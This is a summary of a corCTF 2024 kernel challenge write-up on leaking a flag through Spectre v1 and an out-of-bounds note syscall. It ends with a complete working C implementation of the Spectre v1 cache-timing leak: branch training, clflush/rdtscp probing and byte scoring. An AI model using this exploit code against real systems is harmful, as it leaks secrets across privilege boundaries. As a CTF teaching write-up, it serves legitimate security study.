corCTF 2024: It's Just a DoS Bug Bro - Leaking the Flag from the Filesystem Using Spectre v1

  • Challenge Overview: Continuing the theme from corCTF 2023, the author released an exploitation challenge that connects Linux kernel internals with x86_64 micro-architectural attacks.

    • New Syscalls on Linux 6.9.0: The challenge kernel adds two custom syscalls, corctf_write_note and corctf_read_note.
    • QEMU Boot Command: The kernel boots from an initramfs under QEMU with a specified boot command.
  • Vulnerabilities and Exploits:

    • OOB Read Bug in corctf_read_note: An unchecked index gives an out-of-bounds read, but a read from a bad address oopses, and with oops=panic an oops takes the whole kernel down, so on its own the bug is a DoS rather than an LPE primitive (hence the challenge name).
    • Side-Channel Problem: The unchecked index still flows into copy_to_user, so the memory the kernel touches on the attacker's behalf leaves traces in the cache; timing those traces is a cache side channel that leaks information about the memory value even though the value itself never reaches user space.
    • Using Spectre v1 to Leak Flag: Call corctf_read_note repeatedly with in-bounds indices to train the branch predictor, then pass the out-of-bounds index so the bounds check is speculatively bypassed; timing the resulting cache accesses recovers the flag byte by byte from the file's cached copy in kernel memory.
    • Prerequisites: A KASLR leak and a physmap base leak, plus the offset of the flag file's cached page from the physical memory base, so the kernel virtual address of the cached flag contents can be computed.
  • Implementation Details:

    • Cache Flushing and Timing Functions: clflush evicts the probe buffer's lines from the cache between rounds; rdtscp timestamps an access so a cached line (fast reload) can be told apart from an uncached one (slow reload).
    • Spectre Function: Trains the branch predictor with in-bounds calls, then calls with the target offset and times the accesses for that pre-specified offset.
    • Side-Channel Primitive: Repeats the measurement and scores which probe line reloaded fast, and from the scores determines the original byte value.
  • Harder Version and Choices: A harder variant had no OOB access at all and required a more difficult side channel. The author opted for the easier version and added a "flag verifier daemon" whose job is to keep the flag file's contents resident in the cache.
  • Other Challenges: The author also wrote trojan-turtles and vmquack's combinator in collaboration with anematode.
  • Conclusion: Considered it a nifty challenge, gave shoutouts to the solvers, and looks forward to corCTF 2025.
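As an added example (not code from the challenge or the write-up), the user-space shape of the primitive described under "Vulnerabilities and Exploits" and "Implementation Details" above: clflush to evict the probe lines, rdtscp to time a reload, a branch-free training loop that slips one out-of-bounds index in among in-bounds ones so the bounds check is speculatively bypassed, and a scoring loop that turns hit/miss timings into a byte. The notes[] buffer, its length check, the probe buffer and the constructed corctf{...} secret are stand-ins for the kernel-side state the challenge leaks; the function names, the 512-byte stride and the 80-cycle hit threshold are assumptions to tune per machine. The leak itself only works on x86-64 hardware (and not under every hypervisor); on other targets the flush and timer helpers degrade to no-ops so the file still compiles.

```c
#define _POSIX_C_SOURCE 199309L   /* for clock_gettime in the non-x86 fallback */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <time.h>
#ifdef __x86_64__
#include <x86intrin.h>            /* _mm_clflush, __rdtscp */
#endif

#define PROBE_STRIDE 512          /* one cache line per byte value; 512 defeats adjacent-line prefetch */
#define CACHE_HIT_THRESHOLD 80    /* cycles; assumption, tune per machine (L1 hit vs DRAM miss) */

/* Constructed stand-ins for the challenge's kernel state (not the challenge code). */
static uint8_t notes[16] = "training-data-x";             /* in-bounds "note" bytes */
static volatile size_t notes_len = sizeof(notes);         /* the bound the victim checks */
static const char secret[] = "corctf{constructed_flag}";  /* the out-of-bounds target */
static uint8_t probe[256 * PROBE_STRIDE];                 /* attacker-visible buffer reloaded after each round */
static volatile uint8_t sink;                             /* keeps the loads from being optimised away */

static inline void flush_line(const void *p) {
#ifdef __x86_64__
    _mm_clflush(p);
#else
    (void)p;  /* no user-mode line flush here: the leak cannot work off x86, the code only compiles */
#endif
}

/* Time one load of *p; rdtscp waits for earlier loads to complete, so the interval is the load latency. */
static inline uint64_t time_access(const volatile uint8_t *p) {
#ifdef __x86_64__
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    sink = *p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    sink = *p;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)(b.tv_nsec - a.tv_nsec);
#endif
}

/* The Spectre v1 gadget shape: a bounds check, then a load whose value selects a probe line.
 * Architecturally an OOB idx does nothing; during misspeculation it still touches probe[]. */
void victim_read_note(size_t idx) {
    if (idx < notes_len)
        sink = probe[notes[idx] * PROBE_STRIDE];
}

/* Branch-free index selection for the training loop: every sixth call (j % 6 == 0)
 * delivers the malicious index, the other five deliver the in-bounds training index. */
size_t pick_index(int j, size_t training_idx, size_t malicious_idx) {
    size_t mask = ((j % 6) - 1) & ~0xFFFF;   /* 0, or sign-extended 0xFFFF0000 when j % 6 == 0 */
    mask |= mask >> 16;                      /* 0 or all ones */
    return training_idx ^ (mask & (malicious_idx ^ training_idx));
}

/* Highest- and second-highest-scoring byte values. */
int best_guess(const int scores[256], int *second) {
    int best = 0, runner = 0;
    for (int i = 1; i < 256; i++) {
        if (scores[i] > scores[best]) { runner = best; best = i; }
        else if (scores[i] > scores[runner]) runner = i;
    }
    *second = runner;
    return best;
}

/* Recover the byte at notes[malicious_idx] (which may be far out of bounds). */
int leak_byte(size_t malicious_idx) {
    int scores[256] = {0}, second = 0;
    const size_t training_idx = 0;
    for (int tries = 999; tries > 0; tries--) {
        for (int i = 0; i < 256; i++) flush_line(&probe[i * PROBE_STRIDE]);
        for (int j = 29; j >= 0; j--) {
            flush_line((const void *)&notes_len);          /* slow bound load: the branch resolves late */
            for (volatile int z = 0; z < 100; z++) {}     /* let the flush take effect */
            victim_read_note(pick_index(j, training_idx, malicious_idx));
        }
        for (int i = 0; i < 256; i++) {                    /* reload in scrambled order to foil the prefetcher */
            int mix = ((i * 167) + 13) & 255;
            if (time_access(&probe[mix * PROBE_STRIDE]) <= CACHE_HIT_THRESHOLD && mix != notes[training_idx])
                scores[mix]++;
        }
        int best = best_guess(scores, &second);
        if (scores[best] >= 2 * scores[second] + 5) break;  /* clear winner: stop early */
    }
    return best_guess(scores, &second);
}

int main(void) {
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)notes);  /* OOB distance from notes[] to the target */
    printf("leaking %zu bytes at notes[%zu]: ", sizeof(secret) - 1, off);
    for (size_t i = 0; i < sizeof(secret) - 1; i++) {
        int b = leak_byte(off + i);
        putchar(b >= 0x20 && b < 0x7f ? b : '?');
    }
    putchar('\n');
    return 0;
}
```

In the challenge the victim is the kernel syscall rather than victim_read_note, the "malicious index" is the distance from the note buffer to the flag's cached page (computed from the physmap base and the file's physical offset), and the probe buffer is the user memory the kernel touches through copy_to_user; the training, flush, reload and scoring steps are the same.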